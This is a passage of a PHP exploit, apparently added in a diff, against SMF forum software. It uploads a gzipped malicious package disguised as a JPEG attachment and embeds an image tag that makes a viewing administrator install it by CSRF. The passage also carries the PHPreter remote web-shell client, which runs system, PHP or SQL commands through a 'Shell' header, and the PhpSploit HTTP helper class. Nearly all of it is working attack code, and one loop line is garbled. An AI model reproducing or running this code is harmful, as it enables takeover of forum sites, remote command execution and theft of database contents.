+		$this->www->addheader('Referer', $this->furl . 'index.php');
+	}
+	
+	# Log in ...
+	function login()
+	{
+		$user = explode(':', $this->user);
+		
+		$this->url  = 'action=login2';
+		$this->data = 'user='.$user[0].'&passwrd='.$user[1].'&cookielength=-1';
+		$this->post();
+		
+		$this->location->action = 'login2';
+		$this->location->sa     = 'check';
+		
+		if($this->location())
+			$this->msg('Logged in as ' . $user[0]);
+		else
+			$this->msg('Can\'t log in', 1);
+	}
+	
+	# Get seqnum and sescode
+	function get_sessionvars()
+	{
+		$this->get();
+		
+		$this->scode = $this->match('name="sc" value="([0-9a-f]+)"', 1);
+		$this->sqnum = $this->match('name="seqnum" value="([0-9]+)"', 1);
+	}
+	
+	# Submit our post, containing our gzipped package
+	function submit_post()
+	{
+		# Flood control: let's sleep a little
+		
+		$this->msg('Waiting ' . $this->wait . ' secs (flood control)');
+		sleep($this->wait);
+		
+		# Obtain session vars
+		
+		$this->url->action = 'post';
+		$this->url->board  = $this->bid . '.0';
+		
+		$this->get_sessionvars();
+		
+		# and submit the post
+		
+		$this->url->action = 'post2';
+		$this->url->board  = $this->bid;
+		$this->url->start  = '0';
+		
+		$this->data = array
+		(
+			'subject'            => self::SUBJECT,
+			'message'            => self::MESSAGE,
+			'sc'                 => $this->scode,
+			'seqnum'             => $this->sqnum,
+			'icon'               => 'xx',
+			'topic'              => 0,
+			'notify'             => 0,
+			'lock'               => 0,
+			'sticky'             => 0,
+			'move'               => 0,
+			'additional_options' => 0,
+			'attachment[]'       => array
+			(
+				frmdt_filename => 'jpeg.jpg',
+				frmdt_type     => 'image/jpeg',
+				frmdt_content  => $this->GZIP,
+			)
+		);
+		
+		$this->post();
+		
+		# Check the submission
+		
+		$this->location->board = $this->bid;
+		
+		if($this->location())
+		{
+			$this->msg('Post successfully submitted');
+		}
+		else
+		{
+			$this->msg('Error while posting');
+			$this->msg('Try augmenting -wait parameter', 1);
+		}
+		
+		# Find the post id
+		
+		$this->url->board = $this->bid . '.0';
+		$this->get();
+		
+		$this->pid = $this->match('topic=([0-9]+)');
+		$this->pid = max($this->pid);
+	}
+	
+	# Get the avatar ID to obtain its full name, and get msg id
+	function get_postinfo()
+	{
+		$this->url->topic = $this->pid . '.0';
+		$this->get();
+		
+		$this->aid = $this->match('attach=([0-9]+)', 1);
+		$this->mid = $this->match('msg=([0-9]+)', 1);
+		
+		if($this->aid)
+			$this->msg('Got attachment name =)');
+		else
+			$this->msg('Unable to obtain attachment ID ...', 1);
+		
+		if(!$this->mid)
+			$this->msg('Unable to obtain message ID ...', 1);
+	}
+	
+	# Edit our precedent post : just add our "image".
+	function edit_post()
+	{
+		# Obtain session vars
+		
+		$this->url->action = 'post';
+		$this->url->topic  = $this->pid;
+		$this->url->msg    = $this->mid;
+		$this->url->sesc   = $this->scode;
+		
+		$this->get_sessionvars();
+		
+		# Build our CSRF
+		
+		$this->url->{'%61ction'} = 'packages';
+		$this->url->sa           = 'install2';
+		$this->url->package      = $this->aid . '_jpeg_jpg' . md5('jpeg.jpg');
+		$this->url->package      = '../attachments/' . $this->url->package;
+		
+		$this->makeurl();
+		
+		$img = '[img]' . $this->murl . '[/img]';
+		
+		# Edit the post
+		
+		$this->url->action = 'post2';
+		$this->url->sesc   = $this->scode;
+		$this->url->board  = $this->bid;
+		$this->url->msg    = $this->mid;
+		$this->url->start  = 0;
+		
+		$this->data = array
+		(
+			'topic'              => $this->pid,
+			'subject'            => self::SUBJECT,
+			'icon'               => 'xx',
+			'message'            => self::MESSAGE . $img,
+			'notify'             => '0',
+			'lock'               => '0',
+			'goback'             => '1',
+			'sticky'             => '0',
+			'move'               => '0',
+			'attach_del[]'       => '0',
+			'attach_del[]'       => $this->aid,
+			'post'               => 'Save',
+			'num_replies'        => '0',
+			'additional_options' => '0',
+			'sc'                 => $this->scode,
+			'seqnum'             => $this->sqnum,
+		);
+		
+		$this->post();
+		
+		if($this->location(';topic=' . $this->pid))
+			$this->msg('Post successfully edited, everything done.');
+		else
+			$this->msg('Unable to edit the post');
+	}
+	
+	# Find were we are redirected to
+	function location()
+	{
+		# SMF likes making a mess with URL, so ... let's consider
+		# all cases.
+		
+		$expr = '';
+		
+		$this->location = (array) $this->location;
+		
+		foreach($this->location as $key => $value)
+		{
+			$expr .= $key . '[,=]' . urlencode($value) . '(&|;|%26|%3B)';
+		}
+		
+		$this->location = null;
+		
+		$expr = substr($expr, 0, -13);
+		$expr = '#(Refresh|Location):.*' . $expr . '#i';
+		
+		$head = $this->www->getheader();
+
+		return preg_match($expr, $head);
+	}
+	
+	function match($expr, $one = 0)
+	{
+		# SMF likes making a mess with URL, so ... let's consider
+		# all cases.
+		
+		$expr = str_replace('\?', '[\?/]', $expr);
+		$expr = str_replace('=', '[,=]', $expr);
+		$expr = str_replace(';', '(&|;|%26|%3B)', $expr, $count);
+		$expr = '#' . $expr . '#is';
+		
+		$count++;
+		
+		$http = $this->www->getcontent();
+		
+		if(!$one && !preg_match_all($expr, $http, $match))
+			return false;
+
+		if($one && !preg_match($expr, $http, $match))
+			return false;
+		
+		return $match[$count];
+	}
+	
+	function getoption($option)
+	{
+		global $argv, $argc;
+		
+		foreach($argv as $arg)
+		{
+			if($arg == '-' . $option)
+				return true;
+		}
+		
+		return false;
+	}
+	
+	function getparameter($parameter, $default = false)
+	{
+		global $argv, $argc;
+		
+		for($i=0;$i<$argc;$i++)
+		{
+			if($argv[$i] == '-' . $parameter)
+				return $argv[$i+1];
+		}
+		
+		if($default === false)
+			$this->usage();
+		
+		return $default;
+	}
+	
+	function get()
+	{
+		$this->makeurl();
+		$this->www->get($this->murl);
+	}
+	
+	function post()
+	{
+		$this->makeurl();
+		
+		if(is_array($this->data))
+		{
+			$this->data['frmdt_url'] = $this->murl;
+			
+			$this->www->formdata($this->data);
+		}
+		else
+			$this->www->post($this->murl, $this->data);
+	}
+	
+	# Construct a valid URL using the url object/string.
+	function makeurl()
+	{
+		$url = '';
+		
+		if(is_object($this->url))
+		{
+			$url = '';
+			
+			$this->url = (array) $this->url;
+			
+			foreach($this->url as $key => $value)
+			{
+				$url .= $key . '=' . urlencode($value) . '&';
+			}
+				
+			$url = substr($url, 0, -1);
+		}
+		else 
+			$url = $this->url;
+			
+		$url = $this->furl . 'index.php?' . $url;
+		
+		$this->murl = $url;
+		
+		$this->url = null;
+	}
+	
+	# Our SMF package ...
+	function gzip()
+	{
+		$this->GZIP = ''
+		. "\x1f\x8b\x08\x00\x00\x00\x00\x00\x00\x0b\xed\x56\xff\x4f"
+		. "\xda\x40\x14\xe7\x57\x4c\xfc\x1f\x9e\x64\x89\x98\x08\x6d"
+		. "\x01\xcb\x86\xa5\xc6\x29\x8b\x26\x7e\x8b\x34\x4b\x8c\x31"
+		. "\xe4\xa0\x87\xdc\x6c\xef\x9a\xde\x21\x92\x65\xff\xfb\xde"
+		. "\x5d\x71\x52\xdd\x37\x12\x37\x17\xc7\xa3\x69\xb9\xbb\xf7"
+		. "\x5e\xdf\xd7\xcf\x2b\xe3\x52\x91\x28\xaa\xde\xc5\x51\xe1"
+		. "\x4f\x91\x63\xdb\xae\xeb\x42\xc1\x36\xf4\xf0\x84\x8c\x6a"
+		. "\x8d\xad\x26\x38\x8e\x63\xd7\xeb\x76\xdd\x6d\xd6\x00\x1c"
+		. "\xdb\x6d\x3a\x50\xf8\x2b\x34\x46\xff\x53\x34\x29\x15\x42"
+		. "\x15\xfe\x3f\xf2\x76\x30\xf3\x70\x4b\x53\xc9\x04\x6f\x97"
+		. "\x9c\xaa\x5d\xda\xf1\x57\x57\xbc\xb5\xfd\xd3\xbd\xe0\xe2"
+		. "\xac\x03\xb1\x08\xd9\x90\x0d\x88\xc2\x73\xe8\x5e\x74\x83"
+		. "\xce\x31\x94\x46\x4a\x25\x2d\xcb\x9a\x4c\x26\x55\xc9\xe2"
+		. "\x24\xa2\x31\x19\x8c\x18\xa7\xb2\x2a\xd2\x6b\x0b\x35\x5a"
+		. "\xf3\x62\x25\xa3\xb0\x52\x81\x67\xfc\xad\xae\x14\x83\x11"
+		. "\x93\x80\x17\xe1\x40\xef\x88\xb6\x22\x6f\xec\x90\xe1\xce"
+		. "\x50\xa4\xd0\x3d\xfe\x00\x09\x19\xdc\x90\x6b\x34\x70\x75"
+		. "\x05\x45\x77\x83\xa0\x73\x12\x1c\x9e\x9e\xb4\xe0\x70\x08"
+		. "\x53\x31\x06\x92\x52\x50\xe9\x94\xf1\x6b\x50\x02\x58\xd6"
+		. "\x15\xa0\xf4\x2b\x62\xc2\xc7\xb8\x98\x6e\x1a\x46\x39\x12"
+		. "\xe3\x28\xd4\xbc\xa8\x47\x8d\xe8\xbd\x66\xcd\x86\x8f\xb4"
+		. "\x0a\x5a\x25\x53\x30\x61\xa8\x80\x0b\xfc\x23\xd2\x1b\x63"
+		. "\x07\x8a\x6f\x02\x9a\x49\x24\xbe\x8b\xdc\x50\x20\x10\x09"
+		. "\x71\x83\x7a\x88\x02\xad\x6a\x28\xa2\x48\x4c\xb4\x0d\x9a"
+		. "\x9d\x71\xbc\xc7\x99\x2f\x78\x19\x5b\xb2\x9d\x16\x8a\x14"
+		. "\x67\x39\x40\x97\xe5\xf7\x92\x10\x8a\x81\xb4\x32\xd3\x2b"
+		. "\x33\x77\xaa\xc9\x28\xd1\xee\xb7\x9f\x99\x4c\x48\x8f\x1f"
+		. "\x87\x5e\xc2\x00\x33\xd3\xa7\x30\x96\x34\xd4\x41\x35\xc9"
+		. "\x99\xce\xce\xa4\x40\x87\x32\xb7\xa7\x10\x0a\x98\xe0\x02"
+		. "\xb5\x60\x88\xd2\x6f\x11\xe5\x94\x86\x52\x73\xc4\x5a\x1c"
+		. "\x99\xf0\x6e\x82\x99\xa4\x22\xa1\x69\x34\x35\xc9\x84\x67"
+		. "\xad\xab\x8a\xaf\x75\x7a\xb9\x42\xc2\x7a\xe6\xb2\xbd\x68"
+		. "\xd1\x67\x62\x2d\x19\x0f\x7f\x25\xaa\xfb\xa3\x68\x1a\x24"
+		. "\x2b\xe9\xb9\xbc\xcf\x42\x20\x74\x1c\x75\x85\x48\x12\x63"
+		. "\xd9\xc8\x2c\x76\x8c\xc3\x5c\x01\x56\xb4\x9c\xc6\xf1\x6a"
+		. "\xe6\x45\xd1\x63\xa1\xdf\x27\xfd\x4f\x63\xc9\x5a\x7d\xc2"
+		. "\x39\x0d\x7b\x31\x8d\xfb\xd8\xea\x3d\x72\x4b\x10\xf5\x3c"
+		. "\x0b\x39\x34\xe3\xac\xfd\x7d\xbb\xea\x78\xd6\xfd\xc2\x64"
+		. "\xd5\x33\x4d\xc4\xf1\xad\xed\x52\x97\x2a\x85\xb5\x29\x75"
+		. "\x19\x19\x93\x8b\x9e\x4e\x83\x31\xd4\x2c\x8b\x9e\xa4\x24"
+		. "\x1d\x8c\x20\x11\x92\x29\x83\x27\x94\x87\x25\xb0\x66\xa7"
+		. "\x24\x0c\x7d\x6f\xed\x72\x6f\x7f\x37\xd8\xbd\x34\x5b\x6c"
+		. "\x58\x66\x52\x52\x55\x7e\xd3\xeb\x76\xce\x3f\x76\xce\x2f"
+		. "\xd7\x0f\x82\xe0\xac\xd7\x3d\xe8\x1c\x1d\xad\x5f\x6d\x6c"
+		. "\xc0\x67\x4c\x36\xe3\x0a\x9c\x5a\xbd\xb1\xe5\x36\xdf\xbe"
+		. "\xb3\xb7\xe9\x2d\x89\xca\x7d\x6c\x22\xb7\xd1\x0b\xe9\x40"
+		. "\x84\xf4\x87\xe2\xdb\x4f\x85\xef\x98\x2a\x6f\x6c\xc3\x97"
+		. "\xab\x2b\xdf\xb3\xb4\x45\xc6\x11\x2b\xe7\x89\x67\x69\xb7"
+		. "\x35\x6a\xe5\x52\x8a\x1b\xaf\x0e\xff\x1f\x17\xcf\x0b\xcc"
+		. "\x7f\x70\xdd\x7a\x36\xff\x1d\xd7\x75\xec\x06\xce\x7f\x67"
+		. "\xab\xb6\x9c\xff\xff\xc6\xfc\x9f\x2f\x90\x05\xe6\xff\xbc"
+		. "\x98\x99\xff\x39\x3d\xbf\x8d\xa8\x39\x35\x8b\x22\xaa\x86"
+		. "\x2d\xff\xbd\x41\x3e\x98\x21\x1f\xdc\x23\x9f\x39\x5b\x08"
+		. "\x24\xd5\x34\xa1\xfe\x3c\x1c\x78\x96\xd9\xfa\x09\x80\xa2"
+		. "\xf6\x6c\xf2\x66\x20\x93\xc3\x12\xf6\xf0\xe1\xfd\x04\x65"
+		. "\x10\x80\x1e\x04\xbd\x5c\x10\x5e\x23\x06\x2d\x69\x49\x4b"
+		. "\x7a\x19\xfa\x0a\x12\x1a\xc6\x57\x00\x10\x00\x00";
+	}
+}
+
+/*
+ * Copyright (c) Charles FOL
+ *
+ * TITLE:          PHPreter
+ * AUTHOR:         Charles FOL 
+ * VERSION:        1.3
+ * LICENSE:        GNU General Public License
+ *
+ */
+
+class phpreter
+{
+	var $url;
+	var $host;
+	var $port;
+	var $page;
+	
+	var $mode;
+	
+	var $ssql;
+	
+	var $prompt;
+	var $phost;
+	
+	var $expr;
+	var $data;
+	
+	/**
+	 * __construct()
+	 *
+	 * @param url      The url of the remote shell.
+	 * @param expr     The regular expression to catch cmd result.
+	 * @param mode     Mode: php, sql or cmd.
+	 * @param sql      An array with the file to include,
+	 *                 and sql vars
+	 * @param clear    Determines if clear() is called
+	 *                 on startup
+	 */
+	function phpreter($url, $expr='^(.*)$', $mode='cmd', $sql=array(), $clear=false)
+	{
+		$this->url  = $url;
+		$this->expr = '#' . $expr . '#is';
+		
+		#
+		# Set data
+		#
+		
+		$infos         = parse_url($this->url);
+		$this->host    = $infos['host'];
+		$this->port    = isset($infos['port']) ? $infos['port'] : 80;
+		$this->page    = $infos['path'];
+		
+		# www.(site).com
+		$host_tmp      = explode('.', $this->host);
+		$this->phost   = $host_tmp[ count($host_tmp)-2 ];
+		
+		# Set up MySQL connection string
+		$this->set_ssql($sql);
+		
+		# Switch to default mode
+		$this->setmode($mode);
+		
+		#
+		# Main Loop
+		#
+
+		if($clear)
+			$this->clear();
+
+		print $this->prompt;
+
+		while( !preg_match('#^(quit|exit|close)$#i', ($cmd = trim(fgets(STDIN)))) )
+		{
+			# change mode
+			if(preg_match('#^(set )?mode(=| )(sql|cmd|php)$#i', $cmd, $array))
+				$this->setmode($array[3]);
+			
+			# clear data
+			elseif(preg_match('#^clear$#i', $cmd))
+				$this->clear();
+			
+			# else
+			else print $this->exec($cmd);
+			
+			print $this->prompt;
+		}
+	}
+	
+	/**
+	 * set_ssql()
+	 * Build $ssql var
+	 */
+	function set_ssql($sql)
+	{
+		$this->ssql = '';
+		
+		$sql = (object) $sql;
+		
+		# is there something to include ?
+		
+		if(isset($sql->include))
+			$this->ssql .= 'include(\'' . $sql->include . '\');';
+			
+		# mysql_connect: host, user, passwd
+			
+		$this->ssql .= 'mysql_connect(';
+		
+		foreach(array('host', 'user', 'passwd') as $key)
+		{
+			if(isset($sql->{'var_' . $key}))
+			{
+				$this->ssql .= $sql->{'var_' . $key} . ',';
+			}
+			else
+			{
+				$this->ssql .= "'" . $sql->{$key} . "',";
+			}
+		}
+		
+		$this->ssql  = substr($this->ssql, 0, -1);
+		$this->ssql .= ');';
+		
+		# mysql_select_db
+		
+		if(isset($sql->var_db))
+			$this->ssql .= 'mysql_select_db(' . $sql->var_db . ');';
+		elseif(isset($sql->db))
+			$this->ssql .= 'mysql_select_db(\'' . $sql->db . '\');';
+			
+		# basic display for mysql results
+		
+		$this->ssql .= '$s=str_repeat(\'-\',50)."\n";';
+		$this->ssql .= '$q=mysql_query(\'\') or print($s.mysql_error()."\n");';
+		$this->ssql .= 'print $s;';
+		$this->ssql .= 'if($q)';
+		$this->ssql .= '{';
+		$this->ssql .=     'while($r=mysql_fetch_array($q,MYSQL_ASSOC))';
+		$this->ssql .=     '{';
+		$this->ssql .=         'foreach($r as $k=>$v) print " ".$k.str_repeat(\' \', 20-strlen($k))."| $v\n";';
+		$this->ssql .=         'print $s;';
+		$this->ssql .=     '}';
+		$this->ssql .= '}';
+	}
+	
+	/**
+	 * clear()
+	 * Clear ouput, printing "\n"x50
+	 */
+	function clear()
+	{
+		print str_repeat("\n", 50);
+		return 0;
+	}
+	
+	/**
+	 * setmode()
+	 * Set mode (PHP, CMD, SQL)
+	 */
+	function setmode($newmode)
+	{
+		$this->mode   = strtolower($newmode);
+		$this->prompt = '['.$this->phost.']['.$this->mode.']# ';
+		
+		switch($this->mode)
+		{
+			case 'cmd':
+				$this->data = 'system(\'\');';
+				break;
+			case 'php':
+				$this->data = '';
+				break;
+			case 'sql':
+				$this->data = $this->ssql;
+				break;
+		}
+		
+		return $this->mode;
+	}
+
+	/**
+	 * exec()
+	 * Execute any query and catch the result.
+	 */
+	function exec($cmd)
+	{
+		if($this->data != '')
+			$shell = str_replace('', addslashes($cmd), $this->data);
+		else
+			$shell = $cmd;
+
+		$shell = base64_encode($shell);
+		
+		$packet  = "GET " . $this->page . " HTTP/1.1\r\n";
+		$packet .= "Host: " . $this->host . ( $this->port != 80 ? ':' . $this->port : '' ) . "\r\n";
+		$packet .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14\r\n";
+		$packet .= "Shell: $shell\r\n";
+		$packet .= "Connection: close\r\n\r\n";
+		
+		$fp = fsockopen($this->host, $this->port, $errno, $errstr, 30);
+		
+		fputs($fp, $packet);
+		
+		$recv = '';
+		
+		while(!feof($fp))
+			$recv .= fgets($fp, 128);
+		
+		fclose($fp);
+		
+		# Remove headers
+		$data    = explode("\r\n\r\n", $recv);
+		$headers = array_shift($data);
+		$content = implode("\r\n\r\n", $data);
+		
+		# Unchunk content
+		if(preg_match("#Transfer-Encoding:.*chunked#i", $headers))
+			$content = $this->unchunk($content);
+		
+		# Find results
+		preg_match($this->expr, $content, $match);
+		
+		$match = $match[1];
+		
+		# Add a \n if there is not
+		if(substr($match, -1) != "\n")
+			$match .= "\n";
+		
+		return $match;
+	}
+	
+	/**
+	 * unchunk()
+	 * Remove chunked content's sizes which are put by the apache
+	 * server when it uses chunked transfert-encoding.
+	 */
+	function unchunk($data)
+	{
+		$dsize  = 1;
+		$offset = 0;
+		
+		while($dsize>0)
+		{
+			$hsize_size = strpos($data, "\r\n", $offset) - $offset;
+			
+			$dsize = hexdec(substr($data, $offset, $hsize_size));
+			
+			# Remove $hsize\r\n from $data
+			$data = substr($data, 0, $offset) . substr($data, ($offset + $hsize_size + 2) );
+			
+			$offset += $dsize;
+			
+			# Remove the \r\n before the next $hsize
+			$data = substr($data, 0, $offset) . substr($data, ($offset+2) );
+		}
+		
+		return $data;
+	}
+}
+
+/*
+ * 
+ * Copyright (C) darkfig
+ * 
+ * This program is free software; you can redistribute it and/or 
+ * modify it under the terms of the GNU General Public License 
+ * as published by the Free Software Foundation; either version 2 
+ * of the License, or (at your option) any later version. 
+ * 
+ * This program is distributed in the hope that it will be useful, 
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of 
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the 
+ * GNU General Public License for more details. 
+ * 
+ * You should have received a copy of the GNU General Public License 
+ * along with this program; if not, write to the Free Software 
+ * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.
+ * 
+ * TITLE:          PhpSploit Class
+ * REQUIREMENTS:   PHP 4 / PHP 5
+ * VERSION:        2.0
+ * LICENSE:        GNU General Public License
+ * ORIGINAL URL:   http://www.acid-root.new.fr/tools/03061230.txt
+ * FILENAME:       phpsploitclass.php
+ *
+ * CONTACT:        gmdarkfig@gmail.com (french / english)
+ * GREETZ:         Sparah, Ddx39
+ *
+ * DESCRIPTION:
+ * The phpsploit is a class implementing a web user agent.
+ * You can add cookies, headers, use a proxy server with (or without) a
+ * basic authentification. It supports the GET and the POST method. It can
+ * also be used like a browser with the cookiejar() function (which allow
+ * a server to add several cookies for the next requests) and the
+ * allowredirection() function (which allow the script to follow all
+ * redirections sent by the server). It can return the content (or the
+ * headers) of the request. Others useful functions can be used for debugging.
+ * A manual is actually in development but to know how to use it, you can
+ * read the comments.
+ *
+ * CHANGELOG:
+ *
+ * [2007-06-10] (2.0)
+ *  * Code: Code optimization
+ *  * New: Compatible with PHP 4 by default
+ *
+ * [2007-01-24] (1.2)
+ *  * Bug #2 fixed: Problem concerning the getcookie() function ((|;))
+ *  * New: multipart/form-data enctype is now supported 
+ *
+ * [2006-12-31] (1.1)
+ *  * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug)
+ *  * New: You can now call the getheader() / getcontent() function without parameters
+ *
+ * [2006-12-30] (1.0)
+ *  * First version
+ * 
+ */
+
+class phpsploit
+{
+	var $proxyhost;
+	var $proxyport;
+	var $host;
+	var $path;
+	var $port;
+	var $method;
+	var $url;
+	var $packet;
+	var $proxyuser;
+	var $proxypass;
+	var $header;
+	var $cookie;
+	var $data;
+	var $boundary;
+	var $allowredirection;
+	var $last_redirection;
+	var $cookiejar;
+	var $recv;
+	var $cookie_str;
+	var $header_str;
+	var $server_content;
+	var $server_header;
+	
+
+	/**
+	 * This function is called by the
+	 * get()/post()/formdata() functions.
+	 * You don't have to call it, this is
+	 * the main function.
+	 *
+	 * @access private
+	 * @return string $this->recv ServerResponse
+	 * 
+	 */
+	function sock()
+	{
+		if(!empty($this->proxyhost) && !empty($this->proxyport))
+		   $socket = @fsockopen($this->proxyhost,$this->proxyport);
+		else
+		   $socket = @fsockopen($this->host,$this->port);
+		
+		if(!$socket)
+		   die("Error: Host seems down");
+		
+		if($this->method=='get')
+		   $this->packet = 'GET '.$this->url." HTTP/1.1\r\n";
+		   
+		elseif($this->method=='post' or $this->method=='formdata')
+		   $this->packet = 'POST '.$this->url." HTTP/1.1\r\n";
+		   
+		else
+		   die("Error: Invalid method");
+		
+		if(!empty($this->proxyuser))
+		   $this->packet .= 'Proxy-Authorization: Basic '.base64_encode($this->proxyuser.':'.$this->proxypass)."\r\n";
+		
+		if(!empty($this->header))
+		   $this->packet .= $this->showheader();
+		   
+		if(!empty($this->cookie))
+		   $this->packet .= 'Cookie: '.$this->showcookie()."\r\n";
+	
+		$this->packet .= 'Host: '.$this->host."\r\n";
+		$this->packet .= "Connection: Close\r\n";
+		
+		if($this->method=='post')
+		{
+			$this->packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
+			$this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n";
+			$this->packet .= $this->data."\r\n";
+		}
+		elseif($this->method=='formdata')
+		{
+			$this->packet .= 'Content-Type: multipart/form-data; boundary='.str_repeat('-',27).$this->boundary."\r\n";
+			$this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n";
+			$this->packet .= $this->data;
+		}
+
+		$this->packet .= "\r\n";
+		$this->recv = '';
+
+		fputs($socket,$this->packet);
+
+		while(!feof($socket))
+		   $this->recv .= fgets($socket);
+
+		fclose($socket);
+
+		if($this->cookiejar)
+		   $this->getcookie();
+
+		if($this->allowredirection)
+		   return $this->getredirection();
+		else
+		   return $this->recv;
+	}
+	
+
+	/**
+	 * This function allows you to add several
+	 * cookies in the request.
+	 * 
+	 * @access  public
+	 * @param   string cookn CookieName
+	 * @param   string cookv CookieValue
+	 * @example $this->addcookie('name','value')
+	 * 
+	 */
+	function addcookie($cookn,$cookv)
+	{
+		if(!isset($this->cookie))
+		   $this->cookie = array();
+
+		$this->cookie[$cookn] = $cookv;
+	}
+
+
+	/**
+	 * This function allows you to add several
+	 * headers in the request.
+	 *
+	 * @access  public
+	 * @param   string headern HeaderName
+	 * @param   string headervalue Headervalue
+	 * @example $this->addheader('Client-IP', '128.5.2.3')
+	 * 
+	 */
+	function addheader($headern,$headervalue)
+	{
+		if(!isset($this->header))
+		   $this->header = array();
+		   
+		$this->header[$headern] = $headervalue;
+	}
+
+
+	/**
+	 * This function allows you to use an
+	 * http proxy server. Several methods
+	 * are supported.
+	 * 
+	 * @access  public
+	 * @param   string proxy ProxyHost
+	 * @param   integer proxyp ProxyPort
+	 * @example $this->proxy('localhost',8118)
+	 * @example $this->proxy('localhost:8118')
+	 * 
+	 */
+	function proxy($proxy,$proxyp='')
+	{
+		if(empty($proxyp))
+		{
+			$proxarr = explode(':',$proxy);
+			$this->proxyhost = $proxarr[0];
+			$this->proxyport = (int)$proxarr[1];
+		}
+		else 
+		{
+			$this->proxyhost = $proxy;
+			$this->proxyport = (int)$proxyp;
+		}
+
+		if($this->proxyport > 65535)
+		   die("Error: Invalid port number");
+	}
+	
+
+	/**
+	 * This function allows you to use an
+	 * http proxy server which requires a
+	 * basic authentification. Several
+	 * methods are supported:
+	 *
+	 * @access  public
+	 * @param   string proxyauth ProxyUser
+	 * @param   string proxypass ProxyPass
+	 * @example $this->proxyauth('user','pwd')
+	 * @example $this->proxyauth('user:pwd');
+	 * 
+	 */
+	function proxyauth($proxyauth,$proxypass='')
+	{
+		if(empty($proxypass))
+		{
+			$posvirg = strpos($proxyauth,':');
+			$this->proxyuser = substr($proxyauth,0,$posvirg);
+			$this->proxypass = substr($proxyauth,$posvirg+1);
+		}
+		else
+		{
+			$this->proxyuser = $proxyauth;
+			$this->proxypass = $proxypass;
+		}
+	}
+
+
+	/**
+	 * This function allows you to set
+	 * the 'User-Agent' header.
+	 * 
+	 * @access  public
+	 * @param   string useragent Agent
+	 * @example $this->agent('Firefox')
+	 * 
+	 */
+	function agent($useragent)
+	{
+		$this->addheader('User-Agent',$useragent);
+	}
+
+	
+	/**
+	 * This function returns the headers
+	 * which will be in the next request.
+	 * 
+	 * @access  public
+	 * @return  string $this->header_str Headers
+	 * @example $this->showheader()
+	 * 
+	 */
+	function showheader()
+	{
+		$this->header_str = '';
+		
+		if(!isset($this->header))
+		   return;
+		   
+		foreach($this->header as $name => $value)
+		   $this->header_str .= $name.': '.$value."\r\n";
+		   
+		return $this->header_str;
+	}
+
+	
+	/**
+	 * This function returns the cookies
+	 * which will be in the next request.
+	 * 
+	 * @access  public
+	 * @return  string $this->cookie_str Cookies
+	 * @example $this->showcookie()
+	 * 
+	 */
+	function showcookie()
+	{
+		$this->cookie_str = '';
+		
+		if(!isset($this->cookie))
+		   return;
+		
+		foreach($this->cookie as $name => $value)
+		   $this->cookie_str .= $name.'='.$value.'; ';
+
+		return $this->cookie_str;
+	}
+
+
+	/**
+	 * This function returns the last
+	 * formed http request.
+	 * 
+	 * @access  public
+	 * @return  string $this->packet HttpPacket
+	 * @example $this->showlastrequest()
+	 * 
+	 */
+	function showlastrequest()
+	{
+		if(!isset($this->packet))
+		   return;
+		else
+		   return $this->packet;
+	}
+
+
+	/**
+	 * This function sends the formed
+	 * http packet with the GET method.
+	 * 
+	 * @access  public
+	 * @param   string url Url
+	 * @return  string $this->sock()
+	 * @example $this->url('localhost/index.php?var=x')
+	 * @example $this->url('http://localhost:88/tst.php')
+	 * 
+	 */
+	function get($url)
+	{
+		$this->target($url);
+		$this->method = 'get';
+		return $this->sock();
+	}
+
+	
+	/**
+	 * This function sends the formed
+	 * http packet with the POST method.
+	 *
+	 * @access  public
+	 * @param   string url  Url
+	 * @param   string data PostData
+	 * @return  string $this->sock()
+	 * @example $this->post('http://localhost/','helo=x')
+	 * 
+	 */	
+	function post($url,$data)
+	{
+		$this->target($url);
+		$this->method = 'post';
+		$this->data = $data;
+		return $this->sock();
+	}
+	
+
+	/**
+	 * This function sends the formed http
+	 * packet with the POST method using
+	 * the multipart/form-data enctype.
+	 * 
+	 * @access  public
+	 * @param   array array FormDataArray
+	 * @return  string $this->sock()
+	 * @example $formdata = array(
+	 *                      frmdt_url => 'http://localhost/upload.php',
+	 *                      frmdt_boundary => '123456', # Optional
+	 *                      'var' => 'example',
+	 *                      'file' => array(
+	 *                                frmdt_type => 'image/gif',  # Optional
+	 *                                frmdt_transfert => 'binary' # Optional
+	 *                                frmdt_filename => 'hello.php,
+	 *                                frmdt_content => ''));
+	 *          $this->formdata($formdata);
+	 * 
+	 */
+	function formdata($array)
+	{
+		$this->target($array[frmdt_url]);
+		$this->method = 'formdata';
+		$this->data = '';
+		
+		if(!isset($array[frmdt_boundary]))
+		   $this->boundary = 'phpsploit';
+		else
+		   $this->boundary = $array[frmdt_boundary];
+
+		foreach($array as $key => $value)
+		{
+			if(!preg_match('#^frmdt_(boundary|url)#',$key))
+			{
+				$this->data .= str_repeat('-',29).$this->boundary."\r\n";
+				$this->data .= 'Content-Disposition: form-data; name="'.$key.'";';
+				
+				if(!is_array($value))
+				{
+					$this->data .= "\r\n\r\n".$value."\r\n";
+				}
+				else
+				{
+					$this->data .= ' filename="'.$array[$key][frmdt_filename]."\";\r\n";
+
+					if(isset($array[$key][frmdt_type]))
+					   $this->data .= 'Content-Type: '.$array[$key][frmdt_type]."\r\n";
+
+					if(isset($array[$key][frmdt_transfert]))
+					   $this->data .= 'Content-Transfer-Encoding: '.$array[$key][frmdt_transfert]."\r\n";
+
+					$this->data .= "\r\n".$array[$key][frmdt_content]."\r\n";
+				}
+			}
+		}
+
+		$this->data .= str_repeat('-',29).$this->boundary."--\r\n";
+		return $this->sock();
+	}
+
+	
+	/**
+	 * This function returns the content
+	 * of the server response, without
+	 * the headers.
+	 * 
+	 * @access  public
+	 * @param   string code ServerResponse
+	 * @return  string $this->server_content
+	 * @example $this->getcontent()
+	 * @example $this->getcontent($this->url('http://localhost/'))
+	 * 
+	 */
+	function getcontent($code='')
+	{
+		if(empty($code))
+		   $code = $this->recv;
+
+		$code = explode("\r\n\r\n",$code);
+		$this->server_content = '';
+		
+		for($i=1;$iserver_content .= $code[$i];
+
+		return $this->server_content;
+	}
+
+	
+	/**
+	 * This function returns the headers
+	 * of the server response, without
+	 * the content.
+	 * 
+	 * @access  public
